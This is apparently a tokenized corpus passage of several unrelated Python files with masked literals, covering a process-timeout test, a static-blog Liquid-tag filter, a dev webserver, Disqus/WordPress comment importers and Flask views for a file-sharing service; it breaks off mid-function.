def test_timeout_out ( self ) : <EOL> p = EasyProcess ( <EOL> [ python , '<STR_LIT:-c>' , "<STR_LIT>" ] ) . call ( timeout = <NUM_LIT:1> ) <EOL> eq_ ( p . is_alive ( ) , False ) <EOL> eq_ ( p . timeout_happened , True ) <EOL> ok_ ( p . return_code < <NUM_LIT:0> ) <EOL> eq_ ( p . stdout , '<STR_LIT>' ) <EOL> @ timed ( <NUM_LIT> ) <EOL> def test_time3 ( self ) : <EOL> EasyProcess ( '<STR_LIT>' ) . start ( ) </s>
<s> import io <EOL> import re <EOL> import json <EOL> import pickle <EOL> from os . path import join <EOL> from functools import partial <EOL> from acrylamid import core , utils , lib <EOL> from acrylamid . compat import PY2K , iteritems , text_type as str <EOL> from acrylamid . core import cache <EOL> from acrylamid . utils import Struct <EOL> from acrylamid . filters import Filter <EOL> from acrylamid . lib import requests <EOL> if PY2K : <EOL> from urllib import urlencode <EOL> from urlparse import urlparse , parse_qs <EOL> import cPickle as pickle <EOL> else : <EOL> from urllib . parse import urlencode <EOL> from urllib . parse import urlparse , parse_qs <EOL> __img_re = r'<STR_LIT>' <EOL> __img_re_title = r'<STR_LIT>' <EOL> def blockquote ( header , body ) : <EOL> """<STR_LIT>""" <EOL> def paragraphize ( text ) : <EOL> return '<STR_LIT>' + text . strip ( ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) + '<STR_LIT>' <EOL> by , source , title = None , None , None <EOL> m = re . match ( r'<STR_LIT>' , header , flags = re . I ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> source = m . group ( <NUM_LIT:2> ) + m . group ( <NUM_LIT:3> ) <EOL> title = m . group ( <NUM_LIT:4> ) <EOL> else : <EOL> m = re . match ( r'<STR_LIT>' , header , re . I ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> source = m . group ( <NUM_LIT:2> ) + m . group ( <NUM_LIT:3> ) <EOL> else : <EOL> m = re . match ( r'<STR_LIT>' , header ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> title = m . group ( <NUM_LIT:2> ) <EOL> else : <EOL> m = re . match ( r'<STR_LIT>' , header ) <EOL> if m : <EOL> by = m . group ( <NUM_LIT:1> ) <EOL> quote = paragraphize ( body ) <EOL> author = '<STR_LIT>' % ( by . strip ( ) or '<STR_LIT>' ) <EOL> if source : <EOL> url = re . match ( r'<STR_LIT>' , source ) . group ( <NUM_LIT:1> ) <EOL> parts = [ ] <EOL> for part in url . split ( '<STR_LIT:/>' ) : <EOL> if not part or len ( '<STR_LIT:/>' . join ( parts + [ part ] ) ) >= <NUM_LIT:32> : <EOL> break <EOL> parts . append ( part ) <EOL> else : <EOL> parts . append ( '<STR_LIT>' ) <EOL> href = '<STR_LIT:/>' . join ( parts ) <EOL> if source : <EOL> cite = '<STR_LIT>' % ( source , ( title or href ) ) <EOL> elif title : <EOL> cite = '<STR_LIT>' % title <EOL> if not author : <EOL> blockquote = quote <EOL> elif cite : <EOL> blockquote = quote + "<STR_LIT>" % ( author + cite ) <EOL> else : <EOL> blockquote = quote + "<STR_LIT>" % author <EOL> return "<STR_LIT>" % blockquote <EOL> def img ( header , body = None ) : <EOL> """<STR_LIT>""" <EOL> attrs = re . match ( __img_re , header ) . groupdict ( ) <EOL> m = re . match ( __img_re_title , attrs [ '<STR_LIT:title>' ] ) <EOL> if m : <EOL> attrs [ '<STR_LIT:title>' ] = m . groupdict ( ) [ '<STR_LIT:title>' ] <EOL> attrs [ '<STR_LIT>' ] = m . groupdict ( ) [ '<STR_LIT>' ] <EOL> elif '<STR_LIT:title>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs [ '<STR_LIT:title>' ] . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> if '<STR_LIT:class>' in attrs : <EOL> attrs [ '<STR_LIT:class>' ] = attrs [ '<STR_LIT:class>' ] . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> if attrs : <EOL> return '<STR_LIT>' + '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % ( k , v ) for k , v in iteritems ( attrs ) if v ) + '<STR_LIT>' <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def youtube ( header , body = None ) : <EOL> if header . startswith ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> header = parse_qs ( urlparse ( header ) . query ) [ '<STR_LIT:v>' ] [ <NUM_LIT:0> ] <EOL> return '<STR_LIT>' + '<STR_LIT>' % header + '<STR_LIT>' <EOL> def pullquote ( header , body ) : <EOL> """<STR_LIT>""" <EOL> align = '<STR_LIT:left>' if '<STR_LIT:left>' in header . lower ( ) else '<STR_LIT:right>' <EOL> m = re . search ( r'<STR_LIT>' , body , re . MULTILINE | re . DOTALL ) <EOL> if m : <EOL> return '<STR_LIT>' . format ( <EOL> align , m . group ( <NUM_LIT:1> ) , re . sub ( r'<STR_LIT>' , '<STR_LIT>' , body ) ) <EOL> return "<STR_LIT>" <EOL> def tweet ( header , body = None ) : <EOL> """<STR_LIT>""" <EOL> oembed = '<STR_LIT>' <EOL> args = list ( map ( str . strip , re . split ( r'<STR_LIT>' , header ) ) ) <EOL> params = Struct ( url = args . pop ( <NUM_LIT:0> ) ) <EOL> for arg in args : <EOL> k , v = list ( map ( str . strip , arg . split ( '<STR_LIT:=>' ) ) ) <EOL> if k and v : <EOL> v = v . strip ( '<STR_LIT>' ) <EOL> params [ k ] = v <EOL> try : <EOL> with io . open ( join ( core . cache . cache_dir , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as fp : <EOL> cache = pickle . load ( fp ) <EOL> except ( IOError , pickle . PickleError ) : <EOL> cache = { } <EOL> if params in cache : <EOL> body = cache [ params ] <EOL> else : <EOL> try : <EOL> body = json . loads ( requests . get ( oembed + '<STR_LIT:?>' + urlencode ( params ) ) . read ( ) ) [ '<STR_LIT:html>' ] <EOL> except ( requests . HTTPError , requests . URLError ) : <EOL> log . exception ( '<STR_LIT>' ) <EOL> body = "<STR_LIT>" <EOL> except ( ValueError , KeyError ) : <EOL> log . exception ( '<STR_LIT>' ) <EOL> body = "<STR_LIT>" <EOL> else : <EOL> cache [ params ] = body <EOL> try : <EOL> with io . open ( join ( core . cache . cache_dir , '<STR_LIT>' ) , '<STR_LIT:wb>' ) as fp : <EOL> pickle . dump ( cache , fp , pickle . HIGHEST_PROTOCOL ) <EOL> except ( IOError , pickle . PickleError ) : <EOL> log . exception ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" % body <EOL> class Liquid ( Filter ) : <EOL> match = [ re . compile ( '<STR_LIT>' , re . I ) ] <EOL> priority = <NUM_LIT> <EOL> directives = { <EOL> '<STR_LIT>' : blockquote , '<STR_LIT>' : pullquote , <EOL> '<STR_LIT>' : img , '<STR_LIT>' : tweet , <EOL> '<STR_LIT>' : youtube <EOL> } <EOL> def block ( self , tag ) : <EOL> return re . compile ( '<STR_LIT>' . join ( [ <EOL> r'<STR_LIT>' % tag , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> r'<STR_LIT>' % tag , <EOL> '<STR_LIT>' ] ) , re . MULTILINE | re . DOTALL ) <EOL> def transform ( self , text , entry , * args ) : <EOL> for tag , func in iteritems ( self . directives ) : <EOL> text = re . sub ( self . block ( tag ) , lambda m : func ( * m . groups ( ) ) , text ) <EOL> return text </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> from threading import Thread <EOL> from acrylamid . utils import force_unicode as u <EOL> from acrylamid . compat import PY2K <EOL> from acrylamid . helpers import joinurl <EOL> if PY2K : <EOL> from SocketServer import TCPServer <EOL> from SimpleHTTPServer import SimpleHTTPRequestHandler <EOL> else : <EOL> from socketserver import TCPServer <EOL> from http . server import SimpleHTTPRequestHandler <EOL> class ReuseAddressServer ( TCPServer ) : <EOL> """<STR_LIT>""" <EOL> allow_reuse_address = True <EOL> def serve_forever ( self ) : <EOL> """<STR_LIT>""" <EOL> while not self . kill_received : <EOL> if not self . wait : <EOL> self . handle_request ( ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> class RequestHandler ( SimpleHTTPRequestHandler ) : <EOL> """<STR_LIT>""" <EOL> www_root = '<STR_LIT:.>' <EOL> log_error = lambda x , * y : None <EOL> def translate_path ( self , path ) : <EOL> path = SimpleHTTPRequestHandler . translate_path ( self , path ) <EOL> return joinurl ( u ( os . getcwd ( ) ) , self . www_root , path [ len ( u ( os . getcwd ( ) ) ) : ] ) <EOL> def end_headers ( self ) : <EOL> self . send_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> SimpleHTTPRequestHandler . end_headers ( self ) <EOL> class Webserver ( Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , port = <NUM_LIT> , root = '<STR_LIT:.>' , log_message = lambda x , * y : None ) : <EOL> Thread . __init__ ( self ) <EOL> Handler = RequestHandler <EOL> Handler . www_root = root <EOL> Handler . log_message = log_message <EOL> self . httpd = ReuseAddressServer ( ( "<STR_LIT>" , port ) , Handler ) <EOL> self . httpd . wait = False <EOL> self . httpd . kill_received = False <EOL> def setwait ( self , value ) : <EOL> self . httpd . wait = value <EOL> wait = property ( lambda self : self . httpd . wait , setwait ) <EOL> def run ( self ) : <EOL> self . httpd . serve_forever ( ) <EOL> self . join ( <NUM_LIT:1> ) <EOL> def shutdown ( self ) : <EOL> """<STR_LIT>""" <EOL> self . httpd . kill_received = True <EOL> self . httpd . socket . close ( ) </s>
<s> from __future__ import unicode_literals <EOL> import sys <EOL> import os <EOL> import io <EOL> import json <EOL> def find ( node ) : <EOL> if len ( node ) == <NUM_LIT:2> : <EOL> yield node [ <NUM_LIT:1> ] <EOL> for key in node [ <NUM_LIT:0> ] : <EOL> find ( node [ <NUM_LIT:0> ] [ key ] ) <EOL> def search ( needle , haystack ) : <EOL> if needle [ <NUM_LIT:0> ] not in haystack : <EOL> return False <EOL> node = haystack [ needle [ <NUM_LIT:0> ] ] <EOL> needle = needle [ <NUM_LIT:1> : ] <EOL> i , j = <NUM_LIT:0> , <NUM_LIT:0> <EOL> while j < len ( needle ) : <EOL> if needle [ i : j + <NUM_LIT:1> ] in node [ <NUM_LIT:0> ] : <EOL> node = node [ <NUM_LIT:0> ] [ needle [ i : j + <NUM_LIT:1> ] ] <EOL> i = j + <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> if i != j : <EOL> return False <EOL> if len ( node ) == <NUM_LIT:2> : <EOL> print '<STR_LIT>' , node [ <NUM_LIT:1> ] <EOL> rest = [ ] <EOL> for key in node [ <NUM_LIT:0> ] : <EOL> rest . append ( list ( find ( node [ <NUM_LIT:0> ] [ key ] ) ) ) <EOL> print '<STR_LIT>' , sum ( sum ( rest , [ ] ) , [ ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) < <NUM_LIT:3> : <EOL> print '<STR_LIT>' % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> with io . open ( sys . argv [ <NUM_LIT:1> ] ) as fp : <EOL> tree = { os . path . basename ( sys . argv [ <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] : json . load ( fp ) } <EOL> search ( sys . argv [ <NUM_LIT:2> ] . decode ( '<STR_LIT:utf-8>' ) , tree ) </s>
<s> from __future__ import division , print_function , unicode_literals <EOL> import sys <EOL> import os <EOL> import io <EOL> import re <EOL> import logging <EOL> import textwrap <EOL> import functools <EOL> from time import mktime , strptime , time <EOL> from collections import defaultdict <EOL> from isso . utils import anonymize <EOL> from isso . compat import string_types <EOL> try : <EOL> input = raw_input <EOL> except NameError : <EOL> pass <EOL> try : <EOL> from urlparse import urlparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse <EOL> from xml . etree import ElementTree <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> def strip ( val ) : <EOL> if isinstance ( val , string_types ) : <EOL> return val . strip ( ) <EOL> return val <EOL> class Progress ( object ) : <EOL> def __init__ ( self , end ) : <EOL> self . end = end or <NUM_LIT:1> <EOL> self . istty = sys . stdout . isatty ( ) <EOL> self . last = <NUM_LIT:0> <EOL> def update ( self , i , message ) : <EOL> if not self . istty or message is None : <EOL> return <EOL> cols = int ( ( os . popen ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) ) . split ( ) [ <NUM_LIT:1> ] ) <EOL> message = message [ : cols - <NUM_LIT:7> ] <EOL> if time ( ) - self . last > <NUM_LIT> : <EOL> sys . stdout . write ( "<STR_LIT>" . format ( "<STR_LIT:U+0020>" * cols ) ) <EOL> sys . stdout . write ( "<STR_LIT>" . format ( i / self . end , message ) ) <EOL> sys . stdout . flush ( ) <EOL> self . last = time ( ) <EOL> def finish ( self , message ) : <EOL> self . last = <NUM_LIT:0> <EOL> self . update ( self . end , message + "<STR_LIT:\n>" ) <EOL> class Disqus ( object ) : <EOL> ns = '<STR_LIT>' <EOL> internals = '<STR_LIT>' <EOL> def __init__ ( self , db , xmlfile , empty_id = False ) : <EOL> self . threads = set ( [ ] ) <EOL> self . comments = set ( [ ] ) <EOL> self . db = db <EOL> self . xmlfile = xmlfile <EOL> self . empty_id = empty_id <EOL> def insert ( self , thread , posts ) : <EOL> path = urlparse ( thread . find ( '<STR_LIT>' % Disqus . ns ) . text ) . path <EOL> remap = dict ( ) <EOL> if path not in self . db . threads : <EOL> self . db . threads . new ( path , thread . find ( Disqus . ns + '<STR_LIT:title>' ) . text . strip ( ) ) <EOL> for item in sorted ( posts , key = lambda k : k [ '<STR_LIT>' ] ) : <EOL> dsq_id = item . pop ( '<STR_LIT>' ) <EOL> item [ '<STR_LIT>' ] = remap . get ( item . pop ( '<STR_LIT>' , None ) ) <EOL> rv = self . db . comments . add ( path , item ) <EOL> remap [ dsq_id ] = rv [ "<STR_LIT:id>" ] <EOL> self . comments . update ( set ( remap . keys ( ) ) ) <EOL> def migrate ( self ) : <EOL> tree = ElementTree . parse ( self . xmlfile ) <EOL> res = defaultdict ( list ) <EOL> for post in tree . findall ( Disqus . ns + '<STR_LIT>' ) : <EOL> item = { <EOL> '<STR_LIT>' : post . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) , <EOL> '<STR_LIT:text>' : post . find ( Disqus . ns + '<STR_LIT:message>' ) . text , <EOL> '<STR_LIT>' : post . find ( '<STR_LIT>' . format ( Disqus . ns ) ) . text , <EOL> '<STR_LIT:email>' : post . find ( '<STR_LIT>' . format ( Disqus . ns ) ) . text , <EOL> '<STR_LIT>' : mktime ( strptime ( <EOL> post . find ( Disqus . ns + '<STR_LIT>' ) . text , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : anonymize ( post . find ( Disqus . ns + '<STR_LIT>' ) . text ) , <EOL> '<STR_LIT>' : <NUM_LIT:1> if post . find ( Disqus . ns + "<STR_LIT>" ) . text == "<STR_LIT:false>" else <NUM_LIT:4> <EOL> } <EOL> if post . find ( Disqus . ns + '<STR_LIT>' ) is not None : <EOL> item [ '<STR_LIT>' ] = post . find ( Disqus . ns + '<STR_LIT>' ) . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) <EOL> res [ post . find ( '<STR_LIT>' % Disqus . ns ) . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) ] . append ( item ) <EOL> progress = Progress ( len ( tree . findall ( Disqus . ns + '<STR_LIT>' ) ) ) <EOL> for i , thread in enumerate ( tree . findall ( Disqus . ns + '<STR_LIT>' ) ) : <EOL> progress . update ( i , thread . find ( Disqus . ns + '<STR_LIT:id>' ) . text ) <EOL> if thread . find ( Disqus . ns + '<STR_LIT:id>' ) . text is None and not self . empty_id : <EOL> continue <EOL> id = thread . attrib . get ( Disqus . internals + '<STR_LIT:id>' ) <EOL> if id in res : <EOL> self . threads . add ( id ) <EOL> self . insert ( thread , res [ id ] ) <EOL> self . db . comments . _remove_stale ( ) <EOL> progress . finish ( "<STR_LIT>" . format ( <EOL> len ( self . threads ) , len ( self . comments ) ) ) <EOL> orphans = set ( map ( lambda e : e . attrib . get ( Disqus . internals + "<STR_LIT:id>" ) , tree . findall ( Disqus . ns + "<STR_LIT>" ) ) ) - self . comments <EOL> if orphans and not self . threads : <EOL> print ( "<STR_LIT>" ) <EOL> elif orphans : <EOL> print ( "<STR_LIT>" % len ( orphans ) ) <EOL> for post in tree . findall ( Disqus . ns + "<STR_LIT>" ) : <EOL> if post . attrib . get ( Disqus . internals + "<STR_LIT:id>" ) not in orphans : <EOL> continue <EOL> print ( "<STR_LIT>" . format ( <EOL> post . attrib . get ( Disqus . internals + "<STR_LIT:id>" ) , <EOL> post . find ( "<STR_LIT>" . format ( Disqus . ns ) ) . text , <EOL> post . find ( "<STR_LIT>" . format ( Disqus . ns ) ) . text ) ) <EOL> print ( textwrap . fill ( post . find ( Disqus . ns + "<STR_LIT:message>" ) . text , <EOL> initial_indent = "<STR_LIT:U+0020>" , subsequent_indent = "<STR_LIT:U+0020>" ) ) <EOL> print ( "<STR_LIT>" ) <EOL> class WordPress ( object ) : <EOL> ns = "<STR_LIT>" <EOL> def __init__ ( self , db , xmlfile ) : <EOL> self . db = db <EOL> self . xmlfile = xmlfile <EOL> self . count = <NUM_LIT:0> <EOL> for line in io . open ( xmlfile , encoding = "<STR_LIT:utf-8>" ) : <EOL> m = WordPress . detect ( line ) <EOL> if m : <EOL> self . ns = WordPress . ns . replace ( "<STR_LIT:1.0>" , m . group ( <NUM_LIT:1> ) ) <EOL> break <EOL> else : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> def insert ( self , thread ) : <EOL> url = urlparse ( thread . find ( "<STR_LIT>" ) . text ) <EOL> path = url . path <EOL> if url . query : <EOL> path += "<STR_LIT:?>" + url . query <EOL> self . db . threads . new ( path , thread . find ( "<STR_LIT:title>" ) . text . strip ( ) ) <EOL> comments = list ( map ( self . Comment , thread . findall ( self . ns + "<STR_LIT>" ) ) ) <EOL> comments . sort ( key = lambda k : k [ "<STR_LIT:id>" ] ) <EOL> remap = { } <EOL> ids = set ( c [ "<STR_LIT:id>" ] for c in comments ) <EOL> self . count += len ( ids ) <EOL> while comments : <EOL> for i , item in enumerate ( comments ) : <EOL> if item [ "<STR_LIT>" ] in ids : <EOL> continue <EOL> item [ "<STR_LIT>" ] = remap . get ( item [ "<STR_LIT>" ] , None ) <EOL> rv = self . db . comments . add ( path , item ) <EOL> remap [ item [ "<STR_LIT:id>" ] ] = rv [ "<STR_LIT:id>" ] <EOL> ids . remove ( item [ "<STR_LIT:id>" ] ) <EOL> comments . pop ( i ) <EOL> break <EOL> else : <EOL> return <EOL> def migrate ( self ) : <EOL> tree = ElementTree . parse ( self . xmlfile ) <EOL> skip = <NUM_LIT:0> <EOL> items = tree . findall ( "<STR_LIT>" ) <EOL> progress = Progress ( len ( items ) ) <EOL> for i , thread in enumerate ( items ) : <EOL> if thread . find ( "<STR_LIT:title>" ) . text is None or thread . find ( self . ns + "<STR_LIT>" ) is None : <EOL> skip += <NUM_LIT:1> <EOL> continue <EOL> progress . update ( i , thread . find ( "<STR_LIT:title>" ) . text ) <EOL> self . insert ( thread ) <EOL> progress . finish ( "<STR_LIT>" . format ( <EOL> len ( items ) - skip , self . count ) ) <EOL> def Comment ( self , el ) : <EOL> return { <EOL> "<STR_LIT:text>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT:email>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : anonymize ( <EOL> strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) ) , <EOL> "<STR_LIT>" : mktime ( strptime ( <EOL> strip ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" ) ) , <EOL> "<STR_LIT>" : <NUM_LIT:1> if el . find ( self . ns + "<STR_LIT>" ) . text == "<STR_LIT:1>" else <NUM_LIT:2> , <EOL> "<STR_LIT:id>" : int ( el . find ( self . ns + "<STR_LIT>" ) . text ) , <EOL> "<STR_LIT>" : int ( el . find ( self . ns + "<STR_LIT>" ) . text ) or None <EOL> } <EOL> @ classmethod <EOL> def detect ( cls , peek ) : <EOL> return re . compile ( "<STR_LIT>" ) . search ( peek ) <EOL> def autodetect ( peek ) : <EOL> if '<STR_LIT>' in peek : <EOL> return Disqus <EOL> m = WordPress . detect ( peek ) <EOL> if m : <EOL> return WordPress <EOL> return None <EOL> def dispatch ( type , db , dump , empty_id = False ) : <EOL> if db . execute ( "<STR_LIT>" ) . fetchone ( ) : <EOL> if input ( "<STR_LIT>" ) not in ( "<STR_LIT:y>" , "<STR_LIT:Y>" ) : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> if type == "<STR_LIT>" : <EOL> cls = Disqus <EOL> elif type == "<STR_LIT>" : <EOL> cls = WordPress <EOL> else : <EOL> with io . open ( dump , encoding = "<STR_LIT:utf-8>" ) as fp : <EOL> cls = autodetect ( fp . read ( io . DEFAULT_BUFFER_SIZE ) ) <EOL> if cls is None : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> if cls is Disqus : <EOL> cls = functools . partial ( cls , empty_id = empty_id ) <EOL> cls ( db , dump ) . migrate ( ) </s>
<s> from time import gmtime , strftime <EOL> from random import getrandbits <EOL> from os . path import basename <EOL> from base64 import standard_b64decode <EOL> from urllib import unquote <EOL> from urlparse import urlparse <EOL> from werkzeug import Response <EOL> from pymongo import DESCENDING <EOL> from flask import request , abort , jsonify , json , current_app , render_template , redirect <EOL> from regenwolken . utils import login , private , A1 , slug , thumbnail , clear , urlscheme <EOL> from regenwolken . specs import Item , Account , Drop <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> db , fs = current_app . db , current_app . fs <EOL> config , sessions = current_app . config , current_app . sessions <EOL> if request . method == '<STR_LIT:POST>' and not request . accept_mimetypes . accept_html : <EOL> try : <EOL> account = sessions . pop ( request . form . get ( '<STR_LIT:key>' ) ) [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> abort ( <NUM_LIT> ) <EOL> acc = db . accounts . find_one ( { '<STR_LIT:email>' : account } ) <EOL> source = request . headers . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> privacy = request . form . get ( '<STR_LIT>' , acc [ '<STR_LIT>' ] ) <EOL> _id = fs . upload_file ( config , account , request . files . get ( '<STR_LIT:file>' ) , source , privacy ) <EOL> items = acc [ '<STR_LIT>' ] <EOL> items . append ( _id ) <EOL> db . accounts . update ( { '<STR_LIT>' : acc [ '<STR_LIT>' ] } , { '<STR_LIT>' : { '<STR_LIT>' : items } } , upsert = False ) <EOL> obj = fs . get ( _id ) <EOL> if obj is None : <EOL> abort ( <NUM_LIT> ) <EOL> else : <EOL> return jsonify ( Item ( obj , config , urlscheme ( request ) ) ) <EOL> else : <EOL> users = db . accounts . find ( ) . count ( ) <EOL> files = fs . gfs . _GridFS__files . count ( ) <EOL> size = sum ( [ f [ '<STR_LIT>' ] for f in fs . gfs . _GridFS__files . find ( ) ] ) <EOL> hits = sum ( [ f [ '<STR_LIT>' ] for f in fs . mdb . find ( ) ] ) <EOL> if request . args . get ( '<STR_LIT>' ) == '<STR_LIT>' : <EOL> fields = [ ( '<STR_LIT>' , users ) , ( '<STR_LIT>' , files ) , ( '<STR_LIT:size>' , size ) , ( '<STR_LIT>' , hits ) ] <EOL> return Response ( '<STR_LIT:\n>' . join ( '<STR_LIT>' % field for field in fields ) , <NUM_LIT:200> ) <EOL> return Response ( render_template ( "<STR_LIT>" , ** locals ( ) ) , <NUM_LIT:200> , content_type = "<STR_LIT>" ) <EOL> @ login <EOL> def account ( ) : <EOL> """<STR_LIT>""" <EOL> conf , db = current_app . config , current_app . db <EOL> account = db . accounts . find_one ( { '<STR_LIT:email>' : request . authorization . username } ) <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return jsonify ( clear ( account ) ) <EOL> try : <EOL> _id = account [ '<STR_LIT>' ] <EOL> data = json . loads ( request . data ) [ '<STR_LIT:user>' ] <EOL> except ValueError : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> if len ( data . keys ( ) ) == <NUM_LIT:1> and '<STR_LIT>' in data : <EOL> db . accounts . update ( { '<STR_LIT>' : _id } , { '<STR_LIT>' : { '<STR_LIT>' : data [ '<STR_LIT>' ] } } ) <EOL> account [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> elif len ( data . keys ( ) ) == <NUM_LIT:2> and '<STR_LIT>' in data : <EOL> if not account [ '<STR_LIT>' ] == A1 ( account [ '<STR_LIT:email>' ] , data [ '<STR_LIT>' ] ) : <EOL> return abort ( <NUM_LIT> ) <EOL> if '<STR_LIT:email>' in data : <EOL> if filter ( lambda c : not c in conf [ '<STR_LIT>' ] , data [ '<STR_LIT:email>' ] ) or data [ '<STR_LIT:email>' ] . isdigit ( ) : <EOL> abort ( <NUM_LIT> ) <EOL> if db . accounts . find_one ( { '<STR_LIT:email>' : data [ '<STR_LIT:email>' ] } ) and account [ '<STR_LIT:email>' ] != data [ '<STR_LIT:email>' ] : <EOL> return ( '<STR_LIT>' , <NUM_LIT> ) <EOL> new = { '<STR_LIT:email>' : data [ '<STR_LIT:email>' ] , <EOL> '<STR_LIT>' : A1 ( data [ '<STR_LIT:email>' ] , data [ '<STR_LIT>' ] ) } <EOL> db . accounts . update ( { '<STR_LIT>' : _id } , { '<STR_LIT>' : new } ) <EOL> account [ '<STR_LIT:email>' ] = new [ '<STR_LIT:email>' ] <EOL> account [ '<STR_LIT>' ] = new [ '<STR_LIT>' ] <EOL> elif '<STR_LIT:password>' in data : <EOL> passwd = A1 ( account [ '<STR_LIT:email>' ] , data [ '<STR_LIT:password>' ] ) <EOL> db . accounts . update ( { '<STR_LIT>' : _id } , { '<STR_LIT>' : { '<STR_LIT>' : passwd } } ) <EOL> account [ '<STR_LIT>' ] = passwd <EOL> else : <EOL> abort ( <NUM_LIT> ) <EOL> db . accounts . update ( { '<STR_LIT>' : account [ '<STR_LIT>' ] } , { '<STR_LIT>' : <EOL> { '<STR_LIT>' : strftime ( '<STR_LIT>' , gmtime ( ) ) } } ) <EOL> return jsonify ( clear ( account ) ) <EOL> @ login <EOL> def account_stats ( ) : <EOL> """<STR_LIT>""" <EOL> email = request . authorization . username <EOL> items = current_app . db . accounts . find_one ( { '<STR_LIT:email>' : email } ) [ '<STR_LIT>' ] <EOL> views = <NUM_LIT:0> <EOL> for item in items : <EOL> views += current_app . db . items . find_one ( { '<STR_LIT>' : item } ) [ '<STR_LIT>' ] <EOL> return jsonify ( { '<STR_LIT>' : len ( items ) , '<STR_LIT>' : views } ) <EOL> @ login <EOL> def items ( ) : <EOL> """<STR_LIT>""" <EOL> db , fs = current_app . db , current_app . fs <EOL> ParseResult = urlparse ( request . url ) <EOL> params = { '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT:type>' : None , '<STR_LIT>' : False , <EOL> '<STR_LIT:source>' : None } <EOL> if not ParseResult . query == '<STR_LIT>' : <EOL> query = dict ( [ part . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for part in ParseResult . query . split ( '<STR_LIT:&>' ) ] ) <EOL> params . update ( query ) <EOL> listing = [ ] <EOL> try : <EOL> pp = int ( params [ '<STR_LIT>' ] ) <EOL> page = int ( params [ '<STR_LIT>' ] ) <EOL> email = request . authorization . username <EOL> except ( ValueError , KeyError ) : <EOL> abort ( <NUM_LIT> ) <EOL> query = { '<STR_LIT>' : email } <EOL> if params [ '<STR_LIT:type>' ] != None : <EOL> query [ '<STR_LIT>' ] = params [ '<STR_LIT:type>' ] <EOL> if params [ '<STR_LIT>' ] == False : <EOL> query [ '<STR_LIT>' ] = None <EOL> if params [ '<STR_LIT:source>' ] != None : <EOL> query [ '<STR_LIT:source>' ] = { '<STR_LIT>' : '<STR_LIT>' + unquote ( params [ '<STR_LIT:source>' ] ) } <EOL> items = db . items . find ( query ) <EOL> for item in items . sort ( '<STR_LIT>' , DESCENDING ) [ pp * ( page - <NUM_LIT:1> ) : pp * page ] : <EOL> listing . append ( Item ( fs . get ( _id = item [ '<STR_LIT>' ] ) , <EOL> current_app . config , urlscheme ( request ) ) ) <EOL> return json . dumps ( listing [ : : - <NUM_LIT:1> ] ) <EOL> @ login <EOL> def items_new ( ) : <EOL> """<STR_LIT>""" <EOL> acc = current_app . db . accounts . find_one ( { '<STR_LIT:email>' : request . authorization . username } ) <EOL> ParseResult = urlparse ( request . url ) <EOL> privacy = '<STR_LIT>' if acc [ '<STR_LIT>' ] else '<STR_LIT>' <EOL> if not ParseResult . query == '<STR_LIT>' : <EOL> query = dict ( [ part . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) for part in ParseResult . query . split ( '<STR_LIT:&>' ) ] ) <EOL> privacy = '<STR_LIT>' if query . get ( '<STR_LIT>' , None ) else '<STR_LIT>' <EOL> key = current_app . sessions . new ( request . authorization . username ) <EOL> res = { "<STR_LIT:url>" : urlscheme ( request ) + '<STR_LIT>' + current_app . config [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" : current_app . config [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" : { "<STR_LIT>" : privacy , <EOL> "<STR_LIT:key>" : key <EOL> } , <EOL> } <EOL> return jsonify ( res ) <EOL> @ private ( lambda req : req . accept_mimetypes . accept_html ) <EOL> def items_view ( 